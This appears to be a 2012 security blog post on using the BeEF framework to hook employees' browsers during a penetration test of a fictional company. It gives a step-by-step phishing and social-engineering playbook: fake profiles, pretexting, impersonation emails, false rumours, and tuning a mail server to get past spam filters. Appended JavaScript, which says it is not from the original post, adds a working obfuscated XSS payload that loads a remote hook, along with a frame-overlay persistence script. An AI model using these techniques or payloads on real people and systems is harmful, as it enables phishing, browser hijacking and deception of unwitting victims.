Monday, May 21, 2012

BeEF In a Real World Pen Test - Part 2: Tasty BeEF nuggets, line, hook and sinker (Social Engineering to get a hook)

In the first part of this series, we explained pre-hooking basics for reaching the maximum number of targets. In this post, we will go through the hooking process, taking into consideration the social and technical aspects of keeping the targets' browsers hooked for as long as possible.

Preparing The Line
During recon of our target, we harvested a few e-mails and infiltrated some social media outlets. Tips from the conversations we observed between employees led us to the unofficial Facebook group for Contoso. Here, we learned that an internal football tournament is held yearly in a nearby stadium, organized by an internal "Sports Committee."

We even found some pictures of last year's winners holding a trophy. We also spotted a couple of people talking about internal e-mails with special discounts on sunglasses as part of an employee benefit program.

On Twitter, we found an interesting hashtag, #screwContosoBoard, carrying quite a bit of anger from employees towards Contoso's management and board of directors.

We also bought a phishing domain "" and a valid SSL certificate for it. Finally, a quick web vulnerability scan identified a reflected cross-site scripting (XSS) vulnerability on Contoso's main website.

We will use this information to build our hooking strategy. We want to use our phishing domain and XSS exploit links to lure browsers on three main fronts: corporate email, Facebook and Twitter.

Preparing The Hook
First, we set the hook on our phishing page. It should have the same anatomy as the original website (header, footer, side panes, CSS, etc.) and be served over HTTPS on our “secure” phishing domain. We'll add a loading progress bar in the middle pane and put up a user-friendly message that says "this page might take some time to load." The bar advances by an amount that decays exponentially, so it races ahead at first and then crawls, never finishing in practice. The JavaScript code below is an example of the progress code that can be used.

var totalProgress = 100;
var currentProgress = 1.0;
// Each tick adds less than the last (exp(-p/3)), so the bar races ahead and then crawls.
// A timer, not a busy loop, keeps the page and the BeEF hook responsive. The element id is ours.
function tick() {
    currentProgress = currentProgress + Math.exp(currentProgress / -3);
    document.getElementById('progress').style.width = currentProgress + '%';
    if (currentProgress < totalProgress) setTimeout(tick, 100);
}
tick();

Disclaimer: None of this code is taken from the Windows file copying progress bar module; any similarity in function is a mere coincidence!

By going fast at the beginning and slower towards the end, we hope the visitor feels encouraged and safe, and is less likely to close the page out of boredom. Better still, the user may switch tabs and leave this one loading in the background, giving us a longer window to hook the browser and do our BeEFy tricks.

Second, we prepare our XSS exploit link. The XSS JavaScript exploit should inject BeEF's hook into the vulnerable page. It should also rewrite the center pane of the vulnerable page to remove the original content and add the loading progress bar, so that the page looks identical to our phishing page. This decreases the probability of the victim noticing anything wrong and maximizes the time they stay hooked. Furthermore, we can use some basic link obfuscation to trick savvy victims: force URL encoding of the whole value of the vulnerable parameter, including the readable text (a normal URL encoder leaves letters and digits as they are). For example, the query parameter:

search=<script src="test.js">

should look like:

search=%3C%73%63%72%69%70%74%20%73%72%63%3D%22%74%65%73%74%2E%6A%73%22%3E
URL shortening services are also a good tool for hiding the real link. They are very common on social networks, especially on Twitter.
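As an added example (not code from the original post or from BeEF itself), the following JavaScript builds such a link end to end: it injects BeEF's hook into the vulnerable page (/hook.js on port 3000 is BeEF's default hook location) and percent-encodes every byte of the parameter value, including the readable text that encodeURIComponent() would leave in the clear. The vulnerable URL, the parameter name, the BeEF host and the element ids are placeholders.

```javascript
// Hypothetical values: Contoso's reflected-XSS search page, the vulnerable parameter,
// and our BeEF server. /hook.js on port 3000 is BeEF's default hook location.
const VULN_URL = 'https://www.contoso.example/search';
const VULN_PARAM = 'search';
const BEEF_HOOK = 'https://beef.example:3000/hook.js';

// encodeURIComponent() leaves letters, digits and -_.!~*'() readable, which is what
// gives a link away to a savvy victim. Percent-encode every UTF-8 byte instead.
function fullyEncode(value) {
  return Array.from(new TextEncoder().encode(value),
    b => '%' + b.toString(16).toUpperCase().padStart(2, '0')).join('');
}

// The reflected payload: pull in the hook, then replace the page's centre pane with the
// same "loading" message and progress bar as the phishing page (element ids assumed).
function buildPayload(hookUrl) {
  return '<script src="' + hookUrl + '"></script>' +
         '<script>document.getElementById("content").innerHTML=' +
         '\'<p>This page might take some time to load.</p><div id="progress"></div>\';' +
         '</script>';
}

// The link we send: the server decodes the value before reflecting it into the page.
function buildLink(baseUrl, param, payload) {
  return baseUrl + '?' + param + '=' + fullyEncode(payload);
}

// Sanity check: nothing readable survives, and decoding gives back the exact payload.
function isFullyEncoded(encoded, original) {
  return /^(%[0-9A-F]{2})+$/.test(encoded) && decodeURIComponent(encoded) === original;
}

const payload = buildPayload(BEEF_HOOK);
const link = buildLink(VULN_URL, VULN_PARAM, payload);
if (!isFullyEncoded(fullyEncode(payload), payload)) throw new Error('encoding broken');
```

The resulting link is long and ugly, which is exactly where a URL shortener comes in; the shortened form is what goes into the tweet or flyer.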

Hooking Grounds
The first hooking ground we target is corporate email. We need to get our hands on a sample of Contoso's internal email to make our phishing emails look convincing. We want to match the internal email anatomy (headers, fonts, text colors, signatures, etc.).

We'll need to do some more social engineering. We use our fictional profile to join the conversation about the sunglasses and ask for more details. Posing as a clueless new employee of Contoso, we receive a couple of responses about how the discount works. We take the discussion away from the public group into a private one-on-one conversation with the friendliest respondent, and ask them to forward the email to a non-corporate address under the ruse that our corporate email is not fully active yet.

Bingo! Now that we have the email, we craft a new one with the same anatomy as our sample, announcing the launch of this year's football tournament. The email should appear to come from the Sports Committee and should have in the "To" field the same group name as the original discount email. In the body, we salute last year's winners and add their picture with the trophy for a more convincing flavor, reassuring people of the email's authenticity.

And of course, we end the email with a “find out more” link that points to our hook. 

Since we have two hooking strategies, we split our targets into two sets. To one set we send links pointing to the phishing hook; to the other, links pointing to the XSS hook. It's worth mentioning that we need to tune our mail server before sending phishing emails, to make sure we don't end up in the recipients' spam folders:

  • The mail server's hostname should match the sending (phishing) domain name.
  • The PTR (reverse DNS) record for the server's IP should resolve to the phishing domain name, and that name should resolve back to the same IP.
  • There should be an SPF record on the phishing domain authorizing our server's IP to send email for it. Microsoft provides a good SPF record builder.
  • Make sure the server's IP, and the ISP's IP block it sits in, are not on any email spam blacklists. Free online blacklist checkers exist for this.

These are all common checks mail filters use to identify spam.
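The SPF item from the list above, as an added JavaScript example that is not part of the original post: a builder for the record we publish on the phishing domain, and a minimal evaluator that does what a receiving mail filter does with the ip4 mechanism and the "all" qualifier. Mechanisms that need DNS lookups (include:, a, mx) are deliberately skipped, and the addresses are constructed for illustration.

```javascript
// Added example (not from the original post): build and evaluate an SPF record.
// Only ip4 and the "all" qualifier are handled; include:/a/mx need DNS and are skipped.

function ipv4ToInt(ip) {
  const parts = ip.split('.').map(Number);
  if (parts.length !== 4 || parts.some(p => !Number.isInteger(p) || p < 0 || p > 255)) {
    throw new Error('bad IPv4 address: ' + ip);
  }
  return ((parts[0] << 24) >>> 0) + (parts[1] << 16) + (parts[2] << 8) + parts[3];
}

// "203.0.113.0/24" or a bare address (treated as /32).
function inCidr(ip, cidr) {
  const [net, lenStr] = cidr.split('/');
  const len = lenStr === undefined ? 32 : Number(lenStr);
  const mask = len === 0 ? 0 : (0xFFFFFFFF << (32 - len)) >>> 0;   // JS shifts mod 32
  return ((ipv4ToInt(ip) & mask) >>> 0) === ((ipv4ToInt(net) & mask) >>> 0);
}

// The record we want published as a TXT record on the phishing domain.
function buildSpfRecord(ips, allQualifier) {
  return ['v=spf1'].concat(ips.map(ip => 'ip4:' + ip), [(allQualifier || '-') + 'all']).join(' ');
}

// What the receiving side does with the envelope sender's domain record.
// Returns 'pass', 'fail', 'softfail' or 'neutral'.
function evaluateSpf(record, senderIp) {
  const terms = record.trim().split(/\s+/);
  if (terms[0] !== 'v=spf1') throw new Error('not an SPF record');
  const results = { '+': 'pass', '-': 'fail', '~': 'softfail', '?': 'neutral' };
  for (const term of terms.slice(1)) {
    let qualifier = '+';
    let mech = term;
    if ('+-~?'.includes(term[0])) { qualifier = term[0]; mech = term.slice(1); }
    let matched = false;
    if (mech.startsWith('ip4:')) matched = inCidr(senderIp, mech.slice(4));
    else if (mech === 'all') matched = true;
    else continue;                       // include:, a, mx, ... need DNS; not handled here
    if (matched) return results[qualifier];
  }
  return 'neutral';                      // record exhausted without a match
}

// Constructed addresses: our sending host plus the rest of its block.
const SPF_RECORD = buildSpfRecord(['203.0.113.10', '203.0.113.0/24']);
```

Publish the record as a TXT record on the phishing domain, send with an envelope sender (MAIL FROM) at that domain, and confirm what is actually visible with `dig +short TXT <domain>` before the first email goes out; `dig -x <ip>` does the same for the PTR item. A "fail" from your own record against your own IP means the mail will be rejected or junked before anyone sees the football tournament.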

The next hooking ground we target is social networking. We start by participating in group conversations and rants about the work environment, politics, etc., but never in a direct conversation, to protect our cover. Keeping our opinions in line with the crowd also avoids controversial discussions that might trigger alarms. The goal of this phase is to get people used to seeing our display names in their news feeds, so a link from us doesn't look odd as a first interaction. After a day or two of activity, we start the fun: a few buzzwords and a link to "check the details." A good buzzing announcement plays on a psychological need shared by a wide range of employees, which we can read off what people say about their company on Facebook and Twitter. At Contoso, based on what we found, we came up with a few good buzzing messages:

  • On Twitter, we tweet "OMG! <CEO name> has resigned! Embarrassing video <hook link> #screwContosoBoard" with retweets from different accounts.
  • On Facebook, in the unofficial group, we broadcast the following buzzing messages from different fake profiles, and perhaps have some of the fake profiles share one of them on their own walls:
    • "Big bonus for referring someone to this vacancy <hook link>; do you know anyone?"
    • "Sign our petition to demand a salary raise <hook link>. Be positive and we will make a difference!"

We might even reach the secret cow level if we combine social engineering with physical materials that link to the hook. Good examples include:

  • Plaster the streets near Contoso with stickers carrying a QR code that encodes the XSS exploit link.
  • Distribute ad-like flyers in front of Contoso's HQ with a short URL to the phishing page.

Adding Sinkers
Now that we have some people clicking links and getting hooked, we need to keep them hooked for as long as possible. Our sinking strategy relies on social engineering, plus a few helpful persistence modules in BeEF.

The greatest sinker of all is how we engineer the phishing/XSS pages to convince people to stay longer. As mentioned earlier, the progress bar is a good trick; combined with suitably entertaining animations, it does the job.

The pop-under module serves as a good persistence technique as well. We set it to auto-run (from its config.yaml) so that it runs whenever a browser is hooked. The module attempts to open a small pop-under window to keep the browser hooked even if the user closes the main tab. Be careful, though: pop-up blockers sometimes block it.

We also want to use the man-in-the-browser module, set to auto-run as well. This ensures that whenever the zombie clicks on any link on the phishing page, the next page is still hooked. Someone would have to manually type a new address into the address bar to get away from our hook.

Finally, we use the "frame-above" module, which is the best option for persistence if we are dealing with IE. It rewrites all links on the web page so that they spawn a 100% by 100% iframe whose source is the selected link, allowing ultra persistence. Michele "antisnatchor" Orru, BeEF's lead core developer, talked about an ultra-cool way to automate the whole process at AthCon 2012 and even created a Ruby script that uses our latest REST API to do Java 1.6.0u27 mass pwnage!
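The frame-above idea, as an added example written for this post rather than BeEF's own module code: every link click on the hooked page is intercepted and the destination is loaded in a 100% by 100% iframe laid over the page, so the hooked top-level document (and the hook running in it) never unloads. Nothing here is specific to the Contoso scenario; the link-filtering helper is kept free of DOM calls so it can be exercised outside a browser.

```javascript
// Added example of the "frame above" persistence technique; not BeEF's module code.

// Which hrefs to send into the overlay. In-page anchors and javascript:/mailto:/tel:
// links would only break, so they are left alone; everything else is resolved to an
// absolute URL against the current page.
function resolveOverlayTarget(href, pageUrl) {
  if (!href) return null;
  const h = href.trim();
  if (h.startsWith('#') || /^(javascript|mailto|tel):/i.test(h)) return null;
  try {
    return new URL(h, pageUrl).href;       // resolves relative links against the page
  } catch (e) {
    return null;                           // unparsable href: let the browser handle it
  }
}

// The address bar can only be made to follow the frame for same-origin targets;
// history.replaceState() throws for a cross-origin URL.
function canRewriteAddressBar(targetUrl, pageUrl) {
  return new URL(targetUrl).origin === new URL(pageUrl).origin;
}

function installFrameAbove(doc, win) {
  let frame = null;
  doc.addEventListener('click', function (ev) {
    const a = ev.target.closest ? ev.target.closest('a[href]') : null;
    if (!a) return;
    const target = resolveOverlayTarget(a.getAttribute('href'), win.location.href);
    if (!target) return;
    ev.preventDefault();                   // the hooked page itself never navigates
    if (!frame) {
      frame = doc.createElement('iframe');
      frame.style.cssText =
        'position:fixed;top:0;left:0;width:100%;height:100%;border:0;z-index:2147483647';
      doc.body.appendChild(frame);
    }
    frame.src = target;
    if (canRewriteAddressBar(target, win.location.href)) {
      win.history.replaceState(null, '', target);   // address bar follows the frame
    }
  }, true);                                // capture phase: beats the page's own handlers
}

// Only wire it up inside a browser; the helpers above are usable anywhere.
if (typeof document !== 'undefined') {
  installFrameAbove(document, window);
}
```

Two caveats a practitioner will hit: a destination that sends X-Frame-Options (or otherwise frame-busts) shows up as a blank overlay, which is a giveaway, and the address bar only follows the frame for same-origin links, so cross-origin destinations leave the original URL visible. Both are reasons the post pairs this with the pop-under and man-in-the-browser modules rather than relying on it alone.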

In the next post, we will talk about how to do the real fun: exfiltrate sensitive data, hop into the internal network, and common pen test practices to limit the scope and prevent counter attacks.
